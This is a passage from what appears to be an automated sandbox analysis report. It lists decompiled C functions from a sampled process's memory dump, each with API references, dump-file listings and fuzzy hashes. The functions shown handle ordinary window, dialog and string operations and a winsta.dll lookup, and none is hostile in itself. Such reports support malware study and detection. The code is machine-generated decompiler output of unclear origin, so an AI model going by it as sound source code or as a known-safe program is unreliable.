                                                                                                                                                                                                                          0x00403a8c
                                                                                                                                                                                                                          0x00403a9c
                                                                                                                                                                                                                          0x00403aba
                                                                                                                                                                                                                          0x00403adf
                                                                                                                                                                                                                          0x00403ae7
                                                                                                                                                                                                                          0x00403af4
                                                                                                                                                                                                                          0x00403af4
                                                                                                                                                                                                                          0x00403ae7
                                                                                                                                                                                                                          0x00403aba
                                                                                                                                                                                                                          0x00403a9c
                                                                                                                                                                                                                          0x00403b13

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                                                                                                                            • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: State$CallMessageProcSendWindow
                                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                                          • API String ID: 3924021322-3554254475
                                                                                                                                                                                                                          • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                                                                                                                          • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                          			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                                                                                                                                                          0x004034f0
                                                                                                                                                                                                                          0x004034f8
                                                                                                                                                                                                                          0x00403506
                                                                                                                                                                                                                          0x00403516
                                                                                                                                                                                                                          0x0040351c
                                                                                                                                                                                                                          0x00403531
                                                                                                                                                                                                                          0x00403537
                                                                                                                                                                                                                          0x00403545
                                                                                                                                                                                                                          0x0040354a
                                                                                                                                                                                                                          0x00403556
                                                                                                                                                                                                                          0x00403567
                                                                                                                                                                                                                          0x00403575
                                                                                                                                                                                                                          0x00403583
                                                                                                                                                                                                                          0x00403583
                                                                                                                                                                                                                          0x00403586
                                                                                                                                                                                                                          0x00403592
                                                                                                                                                                                                                          0x00403598
                                                                                                                                                                                                                          0x004035ac

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403537
                                                                                                                                                                                                                          • _ultow.MSVCRT ref: 00403575
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$memset$_ultow
                                                                                                                                                                                                                          • String ID: cf@$q
                                                                                                                                                                                                                          • API String ID: 3448780718-2693627795
                                                                                                                                                                                                                          • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                                                                                                                          • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                                                                                                                                          0x00407e2d
                                                                                                                                                                                                                          0x00407e46
                                                                                                                                                                                                                          0x00407e48
                                                                                                                                                                                                                          0x00407e4d
                                                                                                                                                                                                                          0x00407e5f
                                                                                                                                                                                                                          0x00407e6b
                                                                                                                                                                                                                          0x00407e6f
                                                                                                                                                                                                                          0x00407e75
                                                                                                                                                                                                                          0x00407e7c
                                                                                                                                                                                                                          0x00407e7d
                                                                                                                                                                                                                          0x00407e88
                                                                                                                                                                                                                          0x00407e8d
                                                                                                                                                                                                                          0x00407e8e
                                                                                                                                                                                                                          0x00407eaa

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E48
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E5F
                                                                                                                                                                                                                            • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                                                                                                                            • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                                                                                                                          • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                                                                                                                          • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                                          			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                                                                                                                                          0x00405e0a
                                                                                                                                                                                                                          0x00405e12
                                                                                                                                                                                                                          0x00405e18
                                                                                                                                                                                                                          0x00405e1c
                                                                                                                                                                                                                          0x00405e1e
                                                                                                                                                                                                                          0x00405e1e
                                                                                                                                                                                                                          0x00405e24
                                                                                                                                                                                                                          0x00405e2c
                                                                                                                                                                                                                          0x00405e2e
                                                                                                                                                                                                                          0x00405e44
                                                                                                                                                                                                                          0x00405e49
                                                                                                                                                                                                                          0x00405e4c
                                                                                                                                                                                                                          0x00405e4d
                                                                                                                                                                                                                          0x00405e68
                                                                                                                                                                                                                          0x00405e74
                                                                                                                                                                                                                          0x00405e74
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405e84
                                                                                                                                                                                                                          0x00405e8c

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                          • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                                                                                                                          • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                                                                                                                                          0x00409a4a
                                                                                                                                                                                                                          0x00409a4f
                                                                                                                                                                                                                          0x00409a56
                                                                                                                                                                                                                          0x00409a5e
                                                                                                                                                                                                                          0x00409a60
                                                                                                                                                                                                                          0x00409a6e
                                                                                                                                                                                                                          0x00409a6e
                                                                                                                                                                                                                          0x00409a60
                                                                                                                                                                                                                          0x00409a71
                                                                                                                                                                                                                          0x00409a76
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409a78
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409a89

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                                                                                                                          • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                                                                                                                          • API String ID: 946536540-379566740
                                                                                                                                                                                                                          • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                                                                                                                          • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                          			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                                                                                                                          0x0040588e
                                                                                                                                                                                                                          0x0040588f
                                                                                                                                                                                                                          0x0040588f
                                                                                                                                                                                                                          0x00405892
                                                                                                                                                                                                                          0x00405896
                                                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                                                          0x004058ad
                                                                                                                                                                                                                          0x004058af
                                                                                                                                                                                                                          0x004058b5
                                                                                                                                                                                                                          0x004058b6
                                                                                                                                                                                                                          0x004058b9
                                                                                                                                                                                                                          0x004058c2
                                                                                                                                                                                                                          0x004058c3
                                                                                                                                                                                                                          0x004058c8
                                                                                                                                                                                                                          0x004058d2
                                                                                                                                                                                                                          0x004058d4
                                                                                                                                                                                                                          0x004058d9
                                                                                                                                                                                                                          0x004058e0
                                                                                                                                                                                                                          0x004058ea
                                                                                                                                                                                                                          0x004058ec
                                                                                                                                                                                                                          0x004058ed
                                                                                                                                                                                                                          0x004058f2
                                                                                                                                                                                                                          0x004058f9
                                                                                                                                                                                                                          0x00405902
                                                                                                                                                                                                                          0x00405898
                                                                                                                                                                                                                          0x00405898
                                                                                                                                                                                                                          0x0040589a
                                                                                                                                                                                                                          0x0040589c
                                                                                                                                                                                                                          0x004058a1
                                                                                                                                                                                                                          0x004058a2
                                                                                                                                                                                                                          0x004058a5
                                                                                                                                                                                                                          0x004058a7
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004058a7
                                                                                                                                                                                                                          0x00405912
                                                                                                                                                                                                                          0x00405915
                                                                                                                                                                                                                          0x0040591e
                                                                                                                                                                                                                          0x0040591e
                                                                                                                                                                                                                          0x00405907
                                                                                                                                                                                                                          0x0040590b

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                                                          • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                                                                                                                          • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                          			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                                                                                                                          0x0040ad06
                                                                                                                                                                                                                          0x0040ad0a
                                                                                                                                                                                                                          0x0040ad0c
                                                                                                                                                                                                                          0x0040ad14
                                                                                                                                                                                                                          0x0040ad19
                                                                                                                                                                                                                          0x0040ad1f
                                                                                                                                                                                                                          0x0040ad23
                                                                                                                                                                                                                          0x0040ad27
                                                                                                                                                                                                                          0x0040ad2a
                                                                                                                                                                                                                          0x0040ad2d
                                                                                                                                                                                                                          0x0040ad34
                                                                                                                                                                                                                          0x0040ad3b
                                                                                                                                                                                                                          0x0040ad3e
                                                                                                                                                                                                                          0x0040ad44
                                                                                                                                                                                                                          0x0040ad48
                                                                                                                                                                                                                          0x0040ad4a
                                                                                                                                                                                                                          0x0040ad52
                                                                                                                                                                                                                          0x0040ad5a
                                                                                                                                                                                                                          0x0040ad64
                                                                                                                                                                                                                          0x0040ad65
                                                                                                                                                                                                                          0x0040ad6b
                                                                                                                                                                                                                          0x0040ad6c
                                                                                                                                                                                                                          0x0040ad73
                                                                                                                                                                                                                          0x0040ad76
                                                                                                                                                                                                                          0x0040ad7c
                                                                                                                                                                                                                          0x0040ad7c
                                                                                                                                                                                                                          0x0040ad7f
                                                                                                                                                                                                                          0x0040ad84

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3917621476-0
                                                                                                                                                                                                                          • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                                                                                                                          • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                                                                                                                          0x00404a62
                                                                                                                                                                                                                          0x00404a6a
                                                                                                                                                                                                                          0x00404a6e
                                                                                                                                                                                                                          0x00404a71
                                                                                                                                                                                                                          0x00404a74
                                                                                                                                                                                                                          0x00404a92
                                                                                                                                                                                                                          0x00404a92
                                                                                                                                                                                                                          0x00404a76
                                                                                                                                                                                                                          0x00404a76
                                                                                                                                                                                                                          0x00404a87
                                                                                                                                                                                                                          0x00404a90
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00404a90
                                                                                                                                                                                                                          0x00404aa3
                                                                                                                                                                                                                          0x00404aa7
                                                                                                                                                                                                                          0x00404aa7
                                                                                                                                                                                                                          0x00404a94
                                                                                                                                                                                                                          0x00404a98

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00404A52
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Item
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3888421826-0
                                                                                                                                                                                                                          • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
